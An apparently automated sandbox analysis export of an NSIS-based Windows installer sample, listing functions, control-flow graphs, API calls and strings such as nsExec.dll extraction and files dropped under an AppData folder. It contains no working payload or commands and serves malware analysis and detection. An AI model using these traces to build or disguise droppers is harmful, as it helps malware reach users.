                                                                        control_flow_graph 282 4038b4-4038cc call 406254 285 4038e0-403917 call 405db7 282->285 286 4038ce-4038de call 405e31 282->286 291 403919-40392a call 405db7 285->291 292 40392f-403935 lstrcatW 285->292 295 40393a-403963 call 403b8a call 405a3d 286->295 291->292 292->295 300 4039f5-4039fd call 405a3d 295->300 301 403969-40396e 295->301 307 403a0b-403a30 LoadImageW 300->307 308 4039ff-403a06 call 405f0c 300->308 301->300 302 403974-40399c call 405db7 301->302 302->300 309 40399e-4039a2 302->309 311 403ab1-403ab9 call 40140b 307->311 312 403a32-403a62 RegisterClassW 307->312 308->307 313 4039b4-4039c0 lstrlenW 309->313 314 4039a4-4039b1 call 405962 309->314 326 403ac3-403ace call 403b8a 311->326 327 403abb-403abe 311->327 315 403b80 312->315 316 403a68-403aac SystemParametersInfoW CreateWindowExW 312->316 320 4039c2-4039d0 lstrcmpiW 313->320 321 4039e8-4039f0 call 405935 call 405eea 313->321 314->313 318 403b82-403b89 315->318 316->311 320->321 325 4039d2-4039dc GetFileAttributesW 320->325 321->300 330 4039e2-4039e3 call 405981 325->330 331 4039de-4039e0 325->331 335 403ad4-403af1 ShowWindow LoadLibraryW 326->335 336 403b57-403b58 call 405267 326->336 327->318 330->321 331->321 331->330 337 403af3-403af8 LoadLibraryW 335->337 338 403afa-403b0c GetClassInfoW 335->338 342 403b5d-403b5f 336->342 337->338 340 403b24-403b47 DialogBoxParamW call 40140b 338->340 341 403b0e-403b1e GetClassInfoW RegisterClassW 338->341 348 403b4c-403b55 call 403804 340->348 341->340 344 403b61-403b67 342->344 345 403b79-403b7b call 40140b 342->345 344->327 346 403b6d-403b74 call 40140b 344->346 345->315 346->327 348->318
                                                                        APIs
                                                                          • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                          • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                          • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                        • lstrcatW.KERNEL32(1033,004226D0), ref: 00403935
                                                                        • lstrlenW.KERNEL32(ExecToStack,?,?,?,ExecToStack,00000000,C:\Users\user\AppData\Roaming\opbevaringssteder,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B5
                                                                        • lstrcmpiW.KERNEL32(?,.exe,ExecToStack,?,?,?,ExecToStack,00000000,C:\Users\user\AppData\Roaming\opbevaringssteder,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C8
                                                                        • GetFileAttributesW.KERNEL32(ExecToStack), ref: 004039D3
                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\opbevaringssteder), ref: 00403A1C
                                                                          • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                        • RegisterClassW.USER32(00428180), ref: 00403A59
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A71
                                                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA6
                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403ADC
                                                                        • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AED
                                                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF8
                                                                        • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B08
                                                                        • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B15
                                                                        • RegisterClassW.USER32(00428180), ref: 00403B1E
                                                                        • DialogBoxParamW.USER32(?,00000000,00403C57,00000000), ref: 00403B3D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: "C:\Users\user\Desktop\160420241245287.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\opbevaringssteder$Control Panel\Desktop\ResourceLocale$ExecToStack$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                        • API String ID: 914957316-1609039486
                                                                        • Opcode ID: 8ef44c221ffc76618c9d3063fdfaa19d9e9f68cd4157665c5f0528a7ad94f78d
                                                                        • Instruction ID: b862c1471ebdc097eb7bd7ac0b5924faedec86185335dcace1f032bfb9465ac2
                                                                        • Opcode Fuzzy Hash: 8ef44c221ffc76618c9d3063fdfaa19d9e9f68cd4157665c5f0528a7ad94f78d
                                                                        • Instruction Fuzzy Hash: 5561B670604201BAE720AF669C46E3B3A6CEB45759F40453FF945B62E2CB786D02CA2D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00403C57 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 353 403c57-403c69 354 403daa-403db9 353->354 355 403c6f-403c75 353->355 357 403e08-403e1d 354->357 358 403dbb-403e03 GetDlgItem * 2 call 40412f SetClassLongW call 40140b 354->358 355->354 356 403c7b-403c84 355->356 361 403c86-403c93 SetWindowPos 356->361 362 403c99-403c9c 356->362 359 403e5d-403e62 call 40417b 357->359 360 403e1f-403e22 357->360 358->357 372 403e67-403e82 359->372 364 403e24-403e2f call 401389 360->364 365 403e55-403e57 360->365 361->362 367 403cb6-403cbc 362->367 368 403c9e-403cb0 ShowWindow 362->368 364->365 386 403e31-403e50 SendMessageW 364->386 365->359 371 4040fc 365->371 373 403cd8-403cdb 367->373 374 403cbe-403cd3 DestroyWindow 367->374 368->367 383 4040fe-404105 371->383 381 403e84-403e86 call 40140b 372->381 382 403e8b-403e91 372->382 378 403cdd-403ce9 SetWindowLongW 373->378 379 403cee-403cf4 373->379 376 4040d9-4040df 374->376 376->371 387 4040e1-4040e7 376->387 378->383 384 403d97-403da5 call 404196 379->384 385 403cfa-403d0b GetDlgItem 379->385 381->382 389 403e97-403ea2 382->389 390 4040ba-4040d3 DestroyWindow EndDialog 382->390 384->383 391 403d2a-403d2d 385->391 392 403d0d-403d24 SendMessageW IsWindowEnabled 385->392 386->383 387->371 394 4040e9-4040f2 ShowWindow 387->394 389->390 395 403ea8-403ef5 call 405f0c call 40412f * 3 GetDlgItem 389->395 390->376 397 403d32-403d35 391->397 398 403d2f-403d30 391->398 392->371 392->391 394->371 423 403ef7-403efc 395->423 424 403eff-403f3b ShowWindow KiUserCallbackDispatcher call 404151 EnableWindow 395->424 402 403d43-403d48 397->402 403 403d37-403d3d 397->403 401 403d60-403d65 call 404108 398->401 401->384 406 403d7e-403d91 SendMessageW 402->406 408 403d4a-403d50 402->408 403->406 407 403d3f-403d41 403->407 406->384 407->401 411 403d52-403d58 call 40140b 408->411 412 403d67-403d70 call 40140b 408->412 421 403d5e 411->421 412->384 420 403d72-403d7c 412->420 420->421 421->401 423->424 427 403f40 424->427 428 403f3d-403f3e 424->428 429 403f42-403f70 GetSystemMenu EnableMenuItem SendMessageW 427->429 428->429 430 403f72-403f83 SendMessageW 429->430 431 403f85 429->431 432 403f8b-403fc9 call 404164 call 405eea lstrlenW call 405f0c SetWindowTextW call 401389 430->432 431->432 432->372 441 403fcf-403fd1 432->441 441->372 442 403fd7-403fdb 441->442 443 403ffa-40400e DestroyWindow 442->443 444 403fdd-403fe3 442->444 443->376 445 404014-404041 CreateDialogParamW 443->445 444->371 446 403fe9-403fef 444->446 445->376 447 404047-40409e call 40412f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 445->447 446->372 448 403ff5 446->448 447->371 453 4040a0-4040b3 ShowWindow call 40417b 447->453 448->371 455 4040b8 453->455 455->376
                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C93
                                                                        • ShowWindow.USER32(?), ref: 00403CB0
                                                                        • DestroyWindow.USER32 ref: 00403CC4
                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CE0
                                                                        • GetDlgItem.USER32(?,?), ref: 00403D01
                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D15
                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403D1C
                                                                        • GetDlgItem.USER32(?,00000001), ref: 00403DCA
                                                                        • GetDlgItem.USER32(?,00000002), ref: 00403DD4
                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEE
                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3F
                                                                        • GetDlgItem.USER32(?,00000003), ref: 00403EE5
                                                                        • ShowWindow.USER32(00000000,?), ref: 00403F06
                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F18
                                                                        • EnableWindow.USER32(?,?), ref: 00403F33
                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F49
                                                                        • EnableMenuItem.USER32(00000000), ref: 00403F50
                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F68
                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F7B
                                                                        • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA4
                                                                        • SetWindowTextW.USER32(?,004226D0), ref: 00403FB8
                                                                        • ShowWindow.USER32(?,0000000A), ref: 004040EC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                        • String ID:
                                                                        • API String ID: 3282139019-0
                                                                        • Opcode ID: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
                                                                        • Instruction ID: 25e1393ee42f6df426570fd4a537ecf3dcaf9ce603c4882d15cf919a8637c385
                                                                        • Opcode Fuzzy Hash: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
                                                                        • Instruction Fuzzy Hash: 2FC1A071A08205BBDB206F61ED49E3B3A68FB89745F40053EF601B15F1CB799852DB2E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402DBC Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 456 402dbc-402e0a GetTickCount GetModuleFileNameW call 405b56 459 402e16-402e44 call 405eea call 405981 call 405eea GetFileSize 456->459 460 402e0c-402e11 456->460 468 402f34-402f42 call 402d1a 459->468 469 402e4a-402e61 459->469 461 40305b-40305f 460->461 475 403013-403018 468->475 476 402f48-402f4b 468->476 471 402e63 469->471 472 402e65-402e72 call 4032f9 469->472 471->472 480 402e78-402e7e 472->480 481 402fcf-402fd7 call 402d1a 472->481 475->461 478 402f77-402fc3 GlobalAlloc call 406370 call 405b85 CreateFileW 476->478 479 402f4d-402f65 call 40330f call 4032f9 476->479 506 402fc5-402fca 478->506 507 402fd9-403009 call 40330f call 403062 478->507 479->475 504 402f6b-402f71 479->504 485 402e80-402e98 call 405b11 480->485 486 402efe-402f02 480->486 481->475 490 402f0b-402f11 485->490 503 402e9a-402ea1 485->503 489 402f04-402f0a call 402d1a 486->489 486->490 489->490 495 402f13-402f21 call 406302 490->495 496 402f24-402f2e 490->496 495->496 496->468 496->469 503->490 508 402ea3-402eaa 503->508 504->475 504->478 506->461 516 40300e-403011 507->516 508->490 509 402eac-402eb3 508->509 509->490 511 402eb5-402ebc 509->511 511->490 513 402ebe-402ede 511->513 513->475 515 402ee4-402ee8 513->515 517 402ef0-402ef8 515->517 518 402eea-402eee 515->518 516->475 519 40301a-40302b 516->519 517->490 520 402efa-402efc 517->520 518->468 518->517 521 403033-403038 519->521 522 40302d 519->522 520->490 523 403039-40303f 521->523 522->521 523->523 524 403041-403059 call 405b11 523->524 524->461
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00402DD0
                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\160420241245287.exe,00000400), ref: 00402DEC
                                                                          • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\160420241245287.exe,80000000,00000003), ref: 00405B5A
                                                                          • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                        • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\160420241245287.exe,C:\Users\user\Desktop\160420241245287.exe,80000000,00000003), ref: 00402E35
                                                                        • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                        • String ID: "C:\Users\user\Desktop\160420241245287.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\160420241245287.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                        • API String ID: 2803837635-643458308
                                                                        • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                        • Instruction ID: 37f794aabb7b6cc22e4429bd010eaec377b65274dead3bcbf73b1a6bf24b43e2
                                                                        • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                        • Instruction Fuzzy Hash: FB610571940205ABDB20AF65DD89BAE3AB8EB04359F20417BF505B32D1C7BC9E41DB9C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401752 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 653 401752-401777 call 402b3a call 4059ac 658 401781-401793 call 405eea call 405935 lstrcatW 653->658 659 401779-40177f call 405eea 653->659 664 401798-401799 call 40617e 658->664 659->664 668 40179e-4017a2 664->668 669 4017a4-4017ae call 40622d 668->669 670 4017d5-4017d8 668->670 678 4017c0-4017d2 669->678 679 4017b0-4017be CompareFileTime 669->679 671 4017e0-4017fc call 405b56 670->671 672 4017da-4017db call 405b31 670->672 680 401870-401899 call 405194 call 403062 671->680 681 4017fe-401801 671->681 672->671 678->670 679->678 693 4018a1-4018ad SetFileTime 680->693 694 40189b-40189f 680->694 682 401852-40185c call 405194 681->682 683 401803-401841 call 405eea * 2 call 405f0c call 405eea call 4056c6 681->683 695 401865-40186b 682->695 683->668 715 401847-401848 683->715 697 4018b3-4018be FindCloseChangeNotification 693->697 694->693 694->697 698 4029d0 695->698 700 4018c4-4018c7 697->700 701 4029c7-4029ca 697->701 702 4029d2-4029d6 698->702 704 4018c9-4018da call 405f0c lstrcatW 700->704 705 4018dc-4018df call 405f0c 700->705 701->698 712 4018e4-402243 call 4056c6 704->712 705->712 712->701 712->702 715->695 717 40184a-40184b 715->717 717->682
                                                                        APIs
                                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 00401793
                                                                        • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs,?,?,00000031), ref: 004017B8
                                                                          • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                          • Part of subcall function 00405194: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                          • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                          • Part of subcall function 00405194: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00402D94), ref: 004051EF
                                                                          • Part of subcall function 00405194: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll), ref: 00405201
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs$ExecToStack
                                                                        • API String ID: 1941528284-121982121
                                                                        • Opcode ID: a7b38559c55b838a7027a09bf7c005228421b1de4cb974c8e4522ac4ff3c4e27
                                                                        • Instruction ID: bc5e94bc6114b027384bbb583ab77f55914405742357509a7a45d2f14902e26b
                                                                        • Opcode Fuzzy Hash: a7b38559c55b838a7027a09bf7c005228421b1de4cb974c8e4522ac4ff3c4e27
                                                                        • Instruction Fuzzy Hash: 0541A071900515BACF10BBB5CC46DAF7A78EF05368B20863BF521B11E2D73C8A419A6E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405194 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 719 405194-4051a9 720 405260-405264 719->720 721 4051af-4051c0 719->721 722 4051c2-4051c6 call 405f0c 721->722 723 4051cb-4051d7 lstrlenW 721->723 722->723 725 4051f4-4051f8 723->725 726 4051d9-4051e9 lstrlenW 723->726 727 405207-40520b 725->727 728 4051fa-405201 SetWindowTextW 725->728 726->720 729 4051eb-4051ef lstrcatW 726->729 730 405251-405253 727->730 731 40520d-40524f SendMessageW * 3 727->731 728->727 729->725 730->720 732 405255-405258 730->732 731->730 732->720
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                        • lstrlenW.KERNEL32(00402D94,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                        • lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00402D94), ref: 004051EF
                                                                        • SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll), ref: 00405201
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                        • String ID: Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll
                                                                        • API String ID: 2531174081-446190933
                                                                        • Opcode ID: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                                        • Instruction ID: f08454111491fc0d39351af24b8902c1f97f976603b555b028d64c931b302e29
                                                                        • Opcode Fuzzy Hash: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                                        • Instruction Fuzzy Hash: 42219D71900518BACB119FA5DD84ADFBFB8EF44354F54807AF904B62A0C7798A41DFA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040317D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
